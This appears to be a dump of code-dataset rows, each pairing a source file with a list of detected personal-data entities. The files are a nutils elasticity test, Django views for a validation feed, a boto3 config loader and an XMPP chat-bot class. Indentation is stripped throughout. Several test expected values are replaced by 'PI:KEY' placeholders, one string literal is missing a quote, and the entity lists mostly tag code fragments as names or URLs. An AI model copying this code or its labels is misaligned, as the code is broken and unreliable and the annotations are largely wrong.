# Once a simulation is developed and tested, it is good practice to save a few
# strategic return values for regression testing. The :mod:`nutils.testing`
# module, which builds on the standard :mod:`unittest` framework, facilitates
# this by providing :func:`nutils.testing.TestCase.assertAlmostEqual64` for the
# embedding of desired results as compressed base64 data.
class test(testing.TestCase):
@testing.requires('matplotlib')
def test_default(self):
cons, lhs = main(nelems=4, etype='square', btype='std', degree=1, poisson=.25)
with self.subTest('constraints'): self.assertAlmostEqual64(cons, '''
eNpjYMACGsiHP0wxMQBKlBdi''')
with self.subTest('left-hand side'): self.assertAlmostEqual64(lhs, '''
eNpjYMAEKcaiRmLGQQZCxgwMYsbrzqcYvz672KTMaIKJimG7CQPDBJM75xabdJ3NMO0xSjG1MUw0Beox
PXIuw7Tk7A/TXqMfQLEfQLEfQLEfpsVnAUzzHtI=''')
@testing.requires('matplotlib')
def test_mixed(self):
cons, lhs = main(nelems=4, etype='mixed', btype='std', degree=1, poisson=.25)
with self.subTest('constraints'): self.assertAlmostEqual64(cons, '''
eNpjYICCBiiEsdFpIuEPU0wMAG6UF2I=''')
with self.subTest('left-hand side'): self.assertAlmostEqual64(lhs, '''
PI:KEY
PI:KEY''')
@testing.requires('matplotlib')
def test_quadratic(self):
cons, lhs = main(nelems=4, etype='square', btype='std', degree=2, poisson=.25)
with self.subTest('constraints'): self.assertAlmostEqual64(cons, '''
eNpjYCACNIxc+MOUMAYA/+NOFg==''')
with self.subTest('left-hand side'): self.assertAlmostEqual64(lhs, '''
eNqFzLPI:KEY
PI:KEY
PI:KEY
PI:KEY
PI:KEY''')
@testing.requires('matplotlib')
def test_poisson(self):
cons, lhs = main(nelems=4, etype='square', btype='std', degree=1, poisson=.4)
with self.subTest('constraints'): self.assertAlmostEqual64(cons, '''
eNpjYMACGsiHP0wxMQBKlBdi''')
with self.subTest('left-hand side'): self.assertAlmostEqual64(lhs, '''
eNpjYMAEFsaTjdcYvTFcasTAsMZI5JyFce6ZKSavjbNMFhhFmDAwZJkknJ1iInom0ZTJJNx0q1GgKQND
uKn32UTTf6d/mLKY/DDdZvQDKPbD1OvsD9M/pwGZyh9l''')
| 4,221 | [['PERSON', "ns.u_i = '"], ['PERSON', 'basis_ni'], ['PERSON', "X_i = 'x_i"], ['PERSON', 'd(u_i'], ['PERSON', 'sqr'], ['PERSON', 'sqr'], ['PERSON', "bezier = domain.sample('bezier'"], ['PERSON', "sxy = bezier.eval(['X'"], ['LOCATION', 'TestCase'], ['IP_ADDRESS', '::\n\n '], ['URL', 'function.Na'], ['URL', 'ns.ba'], ['URL', 'domain.ba'], ['URL', 'ns.mu'], ['URL', 'ns.st'], ['URL', 'ns.st'], ['URL', 'domain.bo'], ['URL', 'domain.bo'], ['URL', 'domain.int'], ['URL', 'solver.so'], ['URL', 'domain.sa'], ['URL', 'export.tr'], ['URL', 'shear.pn'], ['URL', 'bezier.tr'], ['URL', 'bezier.hu'], ['URL', 'nutils.cli.ru'], ['URL', 'elasticity.py'], ['URL', 'elasticity.py'], ['URL', 'cli.ru'], ['URL', 'nutils.testing.TestCase.as'], ['URL', 'testing.re'], ['URL', 'self.su'], ['URL', 'self.as'], ['URL', 'self.su'], ['URL', 'self.as'], ['URL', 'testing.re'], ['URL', 'self.su'], ['URL', 'self.as'], ['URL', 'self.su'], ['URL', 'self.as'], ['URL', 'testing.re'], ['URL', 'self.su'], ['URL', 'self.as'], ['URL', 'self.su'], ['URL', 'self.as'], ['URL', 'testing.re'], ['URL', 'self.su'], ['URL', 'self.as'], ['URL', 'self.su'], ['URL', 'self.as']] |
27 | import json
import random
import datetime
from codalib import APP_AUTHOR
from codalib.bagatom import wrapAtom, makeObjectFeed
from dateutil import parser
from django.conf import settings
from django.contrib.sites.models import Site
from django.contrib.syndication.views import Feed
from django.core.paginator import Paginator
from django.http import HttpResponse, HttpResponseNotFound
from django.shortcuts import get_object_or_404, render
from django.utils.feedgenerator import Atom1Feed
from lxml import etree
from django.views.generic import ListView
from .models import Validate
XML_HEADER = b"<?xml version=\"1.0\"?>\n%s"
class CorrectMimeTypeFeed(Atom1Feed):
mime_type = 'application/xml'
class AtomNextNewsFeed(Feed):
"""
next view.
an atom pub representation of the next validation to occur.
should be a single item.
"""
feed_type = Atom1Feed
link = "/validate/next/"
title = "UNT Coda Validate App"
subtitle = "The highest priority validation item"
reason = 'None'
author_name = APP_AUTHOR.get('name', None)
author_link = APP_AUTHOR.get('uri', None)
feed_type = CorrectMimeTypeFeed
def get_object(self, request, server):
if server:
return server
else:
return None
def items(self, obj):
# need to filter by server first, if provided
reason = ''
if obj:
validations = Validate.objects.all().filter(server=obj)
reason = 'This selection was filtered to only consider \
server %s. ' % obj
else:
validations = Validate.objects.all()
# next check if we have any with a priority above 0
v = validations.filter(
priority__gt=0).order_by('priority_change_date')
if v.exists():
reason += 'Item was chosen because it is the \
oldest prioritized.'
# if set is empty, go with any priority with last_verified older than
# settings.VALIDATION_PERIOD
else:
# It might seem natural to use django's built-in random ordering,
# but that technique becomes slow when using large sets
# because 'order by ?' is very expensive against MySQL dbs.
# v = Validate.objects.all().filter(
# last_verified__gte=datetime.datetime.now() -
# settings.VALIDATION_PERIOD
# ).order_by('?')
# instead, let's do this:
# http://elpenia.wordpress.PI:KEY
now = datetime.datetime.now()
v = validations.filter(
last_verified__lte=now - settings.VALIDATION_PERIOD
)
if v.exists():
random_slice = int(random.random() * v.count())
v = v[random_slice:]
reason += 'Item was randomly selected and within the \
past year because there is no prioritized record.'
# if that set has no objects, pick the oldest verified item.
else:
v = validations.order_by('last_verified')
reason += 'Item was chosen because there \
is no prioritized record and it had not been validated in the longest \
duration of time.'
self.reason = reason
return v[:1]
def item_title(self, item):
return item.identifier
def item_description(self, item):
return self.reason
def item_link(self, item):
return '/APP/validate/%s/' % item.identifier
# for some reason, I couldn't get AtomNextFeed to work without a server
# I don't think optional arguments are supported for class-based syndication
# feeds, so I have this work around to make it work.
class AtomNextFeedNoServer(AtomNextNewsFeed):
def get_object(self, request):
pass
def index(request):
context = {
'recently_prioritized': Validate.objects.filter(
priority__gt=0).order_by('-priority_change_date')[:20],
'recently_verified': Validate.objects.all().order_by('-last_verified')[:20],
'verified_counts': Validate.objects.last_verified_status_counts()
}
return render(request, 'coda_validate/index.html', context)
def last_day_of_month(year, month):
""" Work out the last day of the month """
last_days = [31, 30, 29, 28, 27]
for i in last_days:
try:
end = datetime.datetime(year, month, i)
except ValueError:
continue
else:
return end.day
return None
def stats(request):
"""
stats page
"""
if not Validate.objects.exists():
return render(
request,
'coda_validate/stats.html',
{
'sums_by_date': {},
'validations': None,
'this_month': None,
'last_24h': None,
'last_vp': None,
'unverified': 0,
'passed': 0,
'failed': 0,
'validation_period': '%s days' % str(
settings.VALIDATION_PERIOD.days
),
}
)
# resolve the range for last month filter
today = datetime.date.today()
first = datetime.date(day=1, month=today.month, year=today.year)
last_day = last_day_of_month(first.year, first.month)
this_month_range = [
'%s-%s-01 00:00:00' % (first.year, first.month),
'%s-%s-%s 23:59:59' % (first.year, first.month, last_day),
]
# resolve the range for last 24 hours filter
now = datetime.datetime.now()
twenty_four_hours_ago = now - datetime.timedelta(hours=24)
since_validation_period = now - datetime.timedelta(
days=settings.VALIDATION_PERIOD.days)
# make a set of data that makes sense for the heatmap
result_counts = Validate.objects.last_verified_status_counts()
total = sum(result_counts.values())
sums_by_date = Validate.sums_by_date()
sums_by_date_g = {}
years = set()
for dt, ct in sums_by_date.items():
y, m, d = dt
dt = (y, m - 1, d)
sums_by_date_g[dt] = ct
years.add(y)
sums_by_date = sums_by_date_g
num_years = len(years)
return render(
request,
'coda_validate/stats.html',
{
'sums_by_date': dict((('%d, %d, %d' % s, c)
for s, c in sums_by_date.items())),
'num_years': num_years,
'validations': total,
'this_month': Validate.objects.filter(
last_verified__range=this_month_range).count(),
'last_24h': Validate.objects.filter(
last_verified__range=[twenty_four_hours_ago, now]).count(),
'last_vp': Validate.objects.filter(
last_verified__range=[since_validation_period, now]).count(),
'unverified': result_counts.get('Unverified'),
'passed': result_counts.get('Passed'),
'failed': result_counts.get('Failed'),
'validation_period': '%s days' % str(settings.VALIDATION_PERIOD.days),
}
)
def prioritize(request):
"""
prioritize view
"""
identifier = request.GET.get('identifier')
prioritized = False
if identifier:
v = get_object_or_404(Validate, identifier=identifier)
v.priority = 1
v.priority_change_date = datetime.datetime.now()
v.save()
prioritized = True
return render(
request,
'coda_validate/prioritize.html',
{
'identifier': identifier,
'prioritized': prioritized,
}
)
def validate(request, identifier):
"""
prioritize view
"""
# this view always gets an identifier, if it's wrong, 404
v = get_object_or_404(Validate, identifier=identifier)
# clicked priority button on validate detail page
p = request.GET.get('priority')
if p == '1':
v.priority = 1
v.priority_change_date = datetime.datetime.now()
v.save()
return render(
request,
'coda_validate/validate.html',
{
'validate': v,
}
)
def prioritize_json(request):
"""
prioritize json view
"""
DOMAIN = Site.objects.get_current().domain
identifier = request.GET.get('identifier')
json_dict = {}
json_dict['status'] = 'failure'
status = 404
if identifier:
json_dict['requested_identifier'] = identifier
try:
v = Validate.objects.get(identifier=identifier)
except Exception:
v = None
if v:
v.priority = 1
v.priority_change_date = datetime.datetime.now()
v.save()
json_dict['status'] = 'success'
json_dict['priority'] = v.priority
json_dict['priority_change_date'] = str(v.priority_change_date)
json_dict['atom_pub_url'] = '%s/APP/validate/%s' % \
(DOMAIN, v.identifier)
status = 200
else:
json_dict['response'] = 'identifier was not found'
json_dict['requested_identifier'] = identifier
else:
json_dict['response'] = 'missing identifier parameter'
json_dict['requested_identifier'] = ''
status = 400
response = HttpResponse(content_type='application/json', status=status)
json.dump(
json_dict,
fp=response,
indent=4,
sort_keys=True,
)
return response
def validateToXML(validateObject):
"""
This is the reverse of xmlToValidateObject.
Given a "Validate" object, it generates an
XML object representative of such.
"""
# define namespace
validate_namespace = "http://digital2.library.unt.edu/coda/validatexml/"
val = "{%s}" % validate_namespace
validate_nsmap = {"validate": validate_namespace}
# build xml from object and return
XML = etree.Element("{0}validate".format(val), nsmap=validate_nsmap)
label = etree.SubElement(XML, "{0}identifier".format(val))
label.text = validateObject.identifier
last_verified = etree.SubElement(XML, "{0}last_verified".format(val))
last_verified.text = validateObject.last_verified.isoformat()
last_verified_status = etree.SubElement(XML, "{0}last_verified_status".format(val))
last_verified_status.text = validateObject.last_verified_status
priority_change_date = etree.SubElement(XML, "{0}priority_change_date".format(val))
priority_change_date.text = validateObject.priority_change_date.isoformat()
priority = etree.SubElement(XML, "{0}priority".format(val))
priority.text = str(validateObject.priority)
server = etree.SubElement(XML, "{0}server".format(val))
server.text = validateObject.server
return XML
def xmlToValidateObject(validateXML):
"""
Parse the XML in a POST request and create the validate object
"""
entryRoot = etree.XML(validateXML)
if entryRoot is None:
raise ValueError("Unable to parse uploaded XML")
# parse XML
contentElement = entryRoot.xpath("*[local-name() = 'content']")[0]
validateXML = contentElement.xpath("*[local-name() = 'validate']")[0]
identifier = validateXML.xpath(
"*[local-name() = 'identifier']")[0].text.strip()
last_verified = validateXML.xpath(
"*[local-name() = 'last_verified']")[0].text.strip()
last_verified = parser.parse(last_verified)
last_verified_status = validateXML.xpath(
"*[local-name() = 'last_verified_status']")[0].text.strip()
priority_change_date = validateXML.xpath(
"*[local-name() = 'priority_change_date']")[0].text.strip()
priority_change_date = parser.parse(priority_change_date)
priority = validateXML.xpath(
"*[local-name() = 'priority']")[0].text.strip()
server = validateXML.xpath("*[local-name() = 'server']")[0].text.strip()
# make the object and return
validate = Validate(
identifier=identifier,
last_verified=last_verified,
last_verified_status=last_verified_status,
priority_change_date=priority_change_date,
priority=priority,
server=server,
)
return validate
def xmlToUpdateValidateObject(validateXML):
"""
Parse the XML in a PUT request and adjust the validate based on that
*ONLY MODIFIES 'last_verified_status'*
"""
entryRoot = etree.XML(validateXML)
if entryRoot is None:
raise ValueError("Unable to parse uploaded XML")
# parse XML
contentElement = entryRoot.xpath("*[local-name() = 'content']")[0]
validateXML = contentElement.xpath("*[local-name() = 'validate']")[0]
identifier = validateXML.xpath(
"*[local-name() = 'identifier']")[0].text.strip()
last_verified_status = validateXML.xpath(
"*[local-name() = 'last_verified_status']")[0].text.strip()
# get the object (or 404) and return to the APP view to finish up.
validate = get_object_or_404(Validate, identifier=identifier)
validate.last_verified_status = last_verified_status
validate.last_verified = datetime.datetime.now()
validate.priority = 0
validate.save()
return validate
def app_validate(request, identifier=None):
"""
This method handles the ATOMpub protocol for validate objects
"""
# are we POSTing a new identifier here?
if request.method == 'POST' and not identifier:
# to object
validateObject = xmlToValidateObject(request.body)
validateObject.save()
# and back to xml
validateObjectXML = validateToXML(validateObject)
atomXML = wrapAtom(
xml=validateObjectXML,
id='http://%s/APP/validate/%s/' % (
request.META['HTTP_HOST'], validateObject.identifier
),
title=validateObject.identifier,
)
atomText = XML_HEADER % etree.tostring(atomXML, pretty_print=True)
resp = HttpResponse(atomText, content_type="application/atom+xml")
resp.status_code = 201
resp['Location'] = 'http://%s/APP/validate/%s/' % \
(request.META['HTTP_HOST'], validateObject.identifier)
elif request.method == 'HEAD':
resp = HttpResponse(content_type="application/atom+xml")
resp.status_code = 200
# if not, return a feed
elif request.method == 'GET' and not identifier:
# negotiate the details of our feed here
validates = Validate.objects.all()
page = int(request.GET['page']) if request.GET.get('page') else 1
atomFeed = makeObjectFeed(
paginator=Paginator(validates, 20),
objectToXMLFunction=validateToXML,
feedId=request.path[1:],
webRoot='http://%s' % request.META.get('HTTP_HOST'),
title="validate Entry Feed",
idAttr="identifier",
nameAttr="identifier",
dateAttr="added",
request=request,
page=page,
author={
"name": APP_AUTHOR.get('name', None),
"uri": APP_AUTHOR.get('uri', None)
},
)
atomFeedText = XML_HEADER % etree.tostring(atomFeed, pretty_print=True)
resp = HttpResponse(atomFeedText, content_type="application/atom+xml")
resp.status_code = 200
# updating an existing record
elif request.method == 'PUT' and identifier:
returnValidate = xmlToUpdateValidateObject(request.body)
validateObjectXML = validateToXML(returnValidate)
atomXML = wrapAtom(
xml=validateObjectXML,
id='http://%s/APP/validate/%s/' % (
request.META['HTTP_HOST'], identifier
),
title=identifier,
)
atomText = XML_HEADER % etree.tostring(atomXML, pretty_print=True)
resp = HttpResponse(atomText, content_type="application/atom+xml")
resp.status_code = 200
elif request.method == 'GET' and identifier:
# attempt to retrieve record -- error if unable
try:
validate_object = Validate.objects.get(identifier=identifier)
except Validate.DoesNotExist:
return HttpResponseNotFound(
"There is no validate for identifier %s.\n" % identifier
)
returnValidate = validate_object
validateObjectXML = validateToXML(returnValidate)
atomXML = wrapAtom(
xml=validateObjectXML,
id='http://%s/APP/validate/%s/' % (
request.META['HTTP_HOST'], identifier
),
title=identifier,
author=APP_AUTHOR.get('name', None),
author_uri=APP_AUTHOR.get('uri', None)
)
atomText = XML_HEADER % etree.tostring(atomXML, pretty_print=True)
resp = HttpResponse(atomText, content_type="application/atom+xml")
resp.status_code = 200
elif request.method == 'DELETE' and identifier:
# attempt to retrieve record -- error if unable
try:
validate_object = Validate.objects.get(identifier=identifier)
except:
return HttpResponseNotFound(
"Unable to Delete. There is no identifier %s.\n" % identifier)
# grab the validate, delete it, and inform the user.
returnValidate = validate_object
validateObjectXML = validateToXML(returnValidate)
validate_object.delete()
atomXML = wrapAtom(
xml=validateObjectXML,
id='http://%s/APP/validate/%s/' % (
request.META['HTTP_HOST'], identifier
),
title=identifier,
)
atomText = XML_HEADER % etree.tostring(atomXML, pretty_print=True)
resp = HttpResponse(atomText, content_type="application/atom+xml")
resp.status_code = 200
return resp
def check_json(request):
counts = Validate.objects.last_verified_status_counts()
return HttpResponse(json.dumps(counts), content_type='application/json')
class ValidateListView(ListView):
model = Validate
template_name = 'coda_validate/list.html'
context_object_name = 'validation_list'
paginate_by = 20
def get_queryset(self):
queryset = super(ValidateListView, self).get_queryset()
status = self.request.GET.get('status')
if status:
queryset = queryset.filter(last_verified_status=status)
return queryset
| 18,335 | [['PERSON', 'codalib.bagatom'], ['URL', 'AUTHOR.ge'], ['DATE_TIME', 'past year'], ['PERSON', 'Validate.objects.last_verified_status_counts'], ['DATE_TIME', 'last_day_of_month(year, month'], ['DATE_TIME', '30'], ['DATE_TIME', '29'], ['DATE_TIME', '28'], ['DATE_TIME', "days'"], ['DATE_TIME', 'last month'], ['DATE_TIME', 'today'], ['DATE_TIME', 'month'], ['DATE_TIME', 'last_day'], ['PERSON', '00:00:00'], ['DATE_TIME', 'last 24 hours'], ['PERSON', 'Validate.objects.last_verified_status_counts'], ['LOCATION', 'sums_by_date.items'], ['PERSON', 'num_years'], ['LOCATION', 'sums_by_date.items'], ['PERSON', 'Validate.objects.filter'], ['DATE_TIME', "days'"], ['PERSON', 'SubElement(XML'], ['PERSON', 'SubElement(XML'], ['PERSON', 'last_verified_status = etree'], ['PERSON', 'SubElement(XML'], ['PERSON', 'SubElement(XML'], ['PERSON', 'SubElement(XML'], ['PERSON', 'SubElement(XML'], ['PERSON', 'Parse'], ['PERSON', 'Parse'], ['PERSON', 'Validate.objects.last_verified_status_counts'], ['URL', 'http://digital2.library.unt.edu/coda/validatexml/"'], ['URL', 'codalib.ba'], ['URL', 'django.co'], ['URL', 'django.contrib.sites.mo'], ['URL', 'django.contrib.syndication.vi'], ['URL', 'django.core.pa'], ['URL', 'django.ht'], ['URL', 'django.sh'], ['URL', 'django.views.ge'], ['URL', 'AUTHOR.ge'], ['URL', 'Validate.objects.al'], ['URL', 'Validate.objects.al'], ['URL', 'validations.fi'], ['URL', 'settings.VA'], ['URL', 'Validate.objects.al'], ['URL', 'datetime.datetime.no'], ['URL', 'settings.VA'], ['URL', 'datetime.datetime.no'], ['URL', 'validations.fi'], ['URL', 'settings.VA'], ['URL', 'v.co'], ['URL', 'self.re'], ['URL', 'item.id'], ['URL', 'self.re'], ['URL', 'item.id'], ['URL', 'Validate.objects.fi'], ['URL', 'Validate.objects.al'], ['URL', 'Validate.objects.la'], ['URL', 'index.ht'], ['URL', 'stats.ht'], ['URL', 'settings.VA'], ['URL', 'datetime.date.to'], ['URL', 'today.mo'], ['URL', 'today.ye'], ['URL', 'first.ye'], ['URL', 'first.mo'], ['URL', 'first.ye'], ['URL', 'first.mo'], ['URL', 'first.ye'], ['URL', 'first.mo'], ['URL', 'datetime.datetime.no'], ['URL', 'settings.VA'], ['URL', 'Validate.objects.la'], ['URL', 'counts.va'], ['URL', 'Validate.su'], ['URL', 'date.it'], ['URL', 'years.ad'], ['URL', 'stats.ht'], ['URL', 'date.it'], ['URL', 'Validate.objects.fi'], ['URL', 'Validate.objects.fi'], ['URL', 'Validate.objects.fi'], ['URL', 'counts.ge'], ['URL', 'counts.ge'], ['URL', 'counts.ge'], ['URL', 'settings.VA'], ['URL', 'request.GET.ge'], ['URL', 'v.pr'], ['URL', 'v.pr'], ['URL', 'datetime.datetime.no'], ['URL', 'v.sa'], ['URL', 'prioritize.ht'], ['URL', 'request.GET.ge'], ['URL', 'v.pr'], ['URL', 'v.pr'], ['URL', 'datetime.datetime.no'], ['URL', 'v.sa'], ['URL', 'validate.ht'], ['URL', 'Site.objects.ge'], ['URL', 'request.GET.ge'], ['URL', 'Validate.objects.ge'], ['URL', 'v.pr'], ['URL', 'v.pr'], ['URL', 'datetime.datetime.no'], ['URL', 'v.sa'], ['URL', 'v.pr'], ['URL', 'v.pr'], ['URL', 'v.id'], ['URL', 'etree.Su'], ['URL', 'validateObject.id'], ['URL', 'etree.Su'], ['URL', 'validateObject.la'], ['URL', 'verified.is'], ['URL', 'etree.Su'], ['URL', 'validateObject.la'], ['URL', 'etree.Su'], ['URL', 'validateObject.pr'], ['URL', 'date.is'], ['URL', 'etree.Su'], ['URL', 'validateObject.pr'], ['URL', 'etree.Su'], ['URL', 'validateObject.se'], ['URL', '.text.st'], ['URL', '.text.st'], ['URL', 'parser.pa'], ['URL', '.text.st'], ['URL', '.text.st'], ['URL', 'parser.pa'], ['URL', '.text.st'], ['URL', '.text.st'], ['URL', '.text.st'], ['URL', '.text.st'], ['URL', 'validate.la'], ['URL', 'validate.la'], ['URL', 'datetime.datetime.no'], ['URL', 'validate.pr'], ['URL', 'validate.sa'], ['URL', 'request.me'], ['URL', 'request.bo'], ['URL', 'validateObject.sa'], ['URL', 'request.ME'], ['URL', 'validateObject.id'], ['URL', 'validateObject.id'], ['URL', 'etree.to'], ['URL', 'resp.st'], ['URL', 'request.ME'], ['URL', 'validateObject.id'], ['URL', 'request.me'], ['URL', 'resp.st'], ['URL', 'request.me'], ['URL', 'Validate.objects.al'], ['URL', 'request.GE'], ['URL', 'request.GET.ge'], ['URL', 'request.pa'], ['URL', 'request.META.ge'], ['URL', 'AUTHOR.ge'], ['URL', 'AUTHOR.ge'], ['URL', 'etree.to'], ['URL', 'resp.st'], ['URL', 'request.me'], ['URL', 'request.bo'], ['URL', 'request.ME'], ['URL', 'etree.to'], ['URL', 'resp.st'], ['URL', 'request.me'], ['URL', 'Validate.objects.ge'], ['URL', 'Validate.Do'], ['URL', 'request.ME'], ['URL', 'AUTHOR.ge'], ['URL', 'AUTHOR.ge'], ['URL', 'etree.to'], ['URL', 'resp.st'], ['URL', 'request.me'], ['URL', 'Validate.objects.ge'], ['URL', 'object.de'], ['URL', 'request.ME'], ['URL', 'etree.to'], ['URL', 'resp.st'], ['URL', 'Validate.objects.la'], ['URL', 'list.ht'], ['URL', 'self.request.GET.ge'], ['URL', 'queryset.fi']] |
28 | #!/usr/bin/env python2
# coding=utf-8
"""
Config Handler
"""
__author__ = "Manuel Ebert"
__copyright__ = "Copyright 2015, summer.ai"
__date__ = "2015-11-09"
__email__ = dummy@email.com"
import boto3
import os
from util import AttrDict
path = os.path.dirname(os.path.abspath(__file__))
def load_yaml(filename):
"""
This is a shitty YAML parser. If we were grown ups, we'd use PyYaml of course.
But since PyYaml refuses to run on AWS Lambda, we'll do this instead.
Args:
filename - filename to load
Returns:
dict
"""
def parse_value(value):
if "#" in value:
value = value[:value.index("#")]
value = value.strip(" \n")
if not value:
return None
if value.lower() == "true":
return True
if value.lower() == "false":
return False
try:
return int(value)
except:
try:
return float(value)
except:
return value
result = {}
current_key = None
with open(filename) as f:
for line in f.readlines():
if ":" in line:
key, value = line.split(":", 1)
key = key.strip()
current_key = key
result[key] = parse_value(value)
elif line.strip().startswith("-"):
value = line.strip(" -\n")
if not isinstance(result[current_key], list):
result[current_key] = [parse_value(value)]
else:
result[current_key].append(parse_value(value))
return result
def abs_path(filename):
return os.path.join(path, "config", "{}.yaml".format(filename))
def load_config(config):
keys = load_yaml(abs_path("default"))
keys['credentials'] = {}
if os.path.exists(abs_path("credentials")):
keys['credentials'] = load_yaml(abs_path("credentials"))
if config != 'default':
keys.update(load_yaml(abs_path(config)))
if "aws_access_key" in keys['credentials']:
keys['s3'] = boto3.resource(
's3', region_name=keys['region'],
aws_access_key_id=keys['credentials']['aws_access_key'],
aws_secret_access_key=keys['credentials']['aws_access_secret']
)
keys['s3_client'] = boto3.client(
's3', region_name=keys['region'],
aws_access_key_id=keys['credentials']['aws_access_key'],
aws_secret_access_key=keys['credentials']['aws_access_secret']
)
else:
keys['s3'] = boto3.resource('s3', region_name=keys['region'])
keys['s3_client'] = boto3.client('s3', region_name=keys['region'])
return AttrDict(keys)
config = load_config(os.environ.get('WORDNIK_CONFIG', 'default'))
def update_config(config_name):
global config
config.__data.update(load_yaml(abs_path(config_name)))
| 2,919 | [['EMAIL_ADDRESS', 'dummy@email.com'], ['DATE_TIME', '2015-11-09'], ['PERSON', 'Manuel Ebert'], ['DATE_TIME', '2015'], ['PERSON', 'Args'], ['URL', 'summer.ai'], ['URL', 'email.com'], ['URL', 'os.pa'], ['URL', 'os.pa'], ['URL', 'value.in'], ['URL', 'value.st'], ['URL', 'f.re'], ['URL', 'key.st'], ['URL', 'line.st'], ['URL', 'line.st'], ['URL', 'os.path.jo'], ['URL', 'os.pa'], ['URL', 'boto3.re'], ['URL', 'boto3.cl'], ['URL', 'boto3.re'], ['URL', 'boto3.cl'], ['URL', 'os.environ.ge']] |
29 | #!/usr/bin/env python3
# vim:fileencoding=utf-8
#
# (C) Copyright 2012 lilydjwg dummy@email.com
#
# This file is part of xmpptalk.
#
# xmpptalk is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# xmpptalk is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with xmpptalk. If not, see <http://www.gnu.org/licenses/>.
#
import sys
import os
import logging
import datetime
import base64
import hashlib
from collections import defaultdict
from functools import partial
from xml.etree import ElementTree as ET
import pyxmpp2.exceptions
from pyxmpp2.jid import JID
from pyxmpp2.message import Message
from pyxmpp2.presence import Presence
from pyxmpp2.client import Client
from pyxmpp2.settings import XMPPSettings
from pyxmpp2.roster import RosterReceivedEvent
from pyxmpp2.interfaces import EventHandler, event_handler, QUIT, NO_CHANGE
from pyxmpp2.streamevents import AuthorizedEvent, DisconnectedEvent
from pyxmpp2.interfaces import XMPPFeatureHandler
from pyxmpp2.interfaces import presence_stanza_handler, message_stanza_handler
from pyxmpp2.ext.version import VersionProvider
from pyxmpp2.expdict import ExpiringDictionary
from pyxmpp2.iq import Iq
try:
from xmpp_receipt import ReceiptSender
except ImportError:
ReceiptSender = None
from misc import *
import config
import models
from models import ValidationError
from messages import MessageMixin
from user import UserMixin
if getattr(config, 'conn_lost_interval_minutes', False):
conn_lost_interval = datetime.timedelta(minutes=config.conn_lost_interval_minutes)
else:
conn_lost_interval = None
class ChatBot(MessageMixin, UserMixin, EventHandler, XMPPFeatureHandler):
got_roster = False
message_queue = None
receipt_sender = None
ignore = set()
def __init__(self, jid, settings, botsettings=None):
if 'software_name' not in settings:
settings['software_name'] = self.__class__.__name__
if 'software_version' not in settings:
settings['software_version'] = __version__
version_provider = VersionProvider(settings)
handlers = []
if ReceiptSender:
self.receipt_sender = rs = ReceiptSender()
handlers.append(rs)
handlers.extend([self, version_provider])
self.client = Client(jid, handlers, settings)
self.presence = defaultdict(dict)
self.subscribes = ExpiringDictionary(default_timeout=5)
self.invited = {}
self.avatar_hash = None
self.settings = botsettings
def run(self):
self.client.connect()
self.jid = self.client.jid.bare()
logger.info('self jid: %r', self.jid)
self.update_on_setstatus = set()
if self.receipt_sender:
self.receipt_sender.stream = self.client.stream
self.client.run()
def disconnect(self):
'''Request disconnection and let the main loop run for a 2 more
seconds for graceful disconnection.'''
self.client.disconnect()
while True:
try:
self.client.run(timeout = 2)
except pyxmpp2.exceptions.StreamParseError:
# we raise SystemExit to exit, expat says XML_ERROR_FINISHED
pass
else:
break
def handle_early_message(self):
self.got_roster = True
q = self.message_queue
if q:
self.now = datetime.datetime.utcnow()
for sender, stanza in q:
self.current_jid = sender
self._cached_jid = None
try:
timestamp = stanza.as_xml().find('{urn:xmpp:delay}delay').attrib['stamp']
except AttributeError:
timestamp = None
self.handle_message(stanza.body, timestamp)
self.message_queue = self.__class__.message_queue = None
@event_handler(RosterReceivedEvent)
def roster_received(self, stanze):
self.delayed_call(2, self.handle_early_message)
self.delayed_call(getattr(config, 'reconnect_timeout', 24 * 3600), self.signal_connect)
nick, avatar_type, avatar_file = (getattr(config, x, None) for x in ('nick', 'avatar_type', 'avatar_file'))
if nick or (avatar_type and avatar_file):
self.set_vcard(nick, (avatar_type, avatar_file))
return True
def signal_connect(self):
logging.info('Schedule to re-connecting...')
self.client.disconnect()
@message_stanza_handler()
def message_received(self, stanza):
if stanza.stanza_type != 'chat':
return True
if not stanza.body:
logging.info("%s message: %s", stanza.from_jid, stanza.serialize())
return True
sender = stanza.from_jid
body = stanza.body
self.current_jid = sender
self.now = datetime.datetime.utcnow()
logging.info('[%s] %s', sender, stanza.body)
if '@' not in str(sender.bare()):
logging.info('(server messages ignored)')
return True
if str(sender.bare()) in self.ignore:
logging.info('(The above message is ignored on purpose)')
return True
if getattr(config, 'ban_russian'):
if str(sender.bare()).endswith('.ru'):
logging.info('(Russian messager banned)')
return True
elif is_russian(body):
logging.info('(Russian message banned)')
return True
if not self.got_roster:
if not self.message_queue:
self.message_queue = []
self.message_queue.append((sender, stanza))
else:
self.handle_message(body)
logging.info('done with new message')
return True
def send_message(self, receiver, msg):
if isinstance(receiver, str):
receiver = JID(receiver)
m = Message(
stanza_type = 'chat',
from_jid = self.jid,
to_jid = receiver,
body = msg,
)
self.send(m)
def reply(self, msg):
self.send_message(self.current_jid, msg)
def send(self, stanza):
self.client.stream.send(stanza)
def delayed_call(self, seconds, func, *args, **kwargs):
self.client.main_loop.delayed_call(seconds, partial(func, *args, **kwargs))
@event_handler(DisconnectedEvent)
def handle_disconnected(self, event):
return QUIT
@property
def roster(self):
return self.client.roster
def get_online_users(self):
ret = [x.jid for x in self.roster if x.subscription == 'both' and \
str(x.jid) in self.presence]
logging.info('%d online buddies: %r', len(ret), ret)
return ret
def get_xmpp_status(self, jid):
return sorted(self.presence[str(jid)].values(), key=lambda x: x['priority'], reverse=True)[0]
def xmpp_setstatus(self, status, to_jid=None):
if isinstance(to_jid, str):
to_jid = JID(to_jid)
presence = Presence(status=status, to_jid=to_jid)
self.send(presence)
def update_roster(self, jid, name=NO_CHANGE, groups=NO_CHANGE):
self.client.roster_client.update_item(jid, name, groups)
def removeInvitation(self):
for ri in self.roster.values():
if ri.ask is not None:
self.client.roster_client.remove_item(ri.jid)
logging.info('%s removed', ri.jid)
def unsubscribe(self, jid, type='unsubscribe'):
presence = Presence(to_jid=jid, stanza_type=type)
self.send(presence)
def subscribe(self, jid):
self.invited[jid] = 2
presence = Presence(to_jid=jid, stanza_type='subscribe')
self.send(presence)
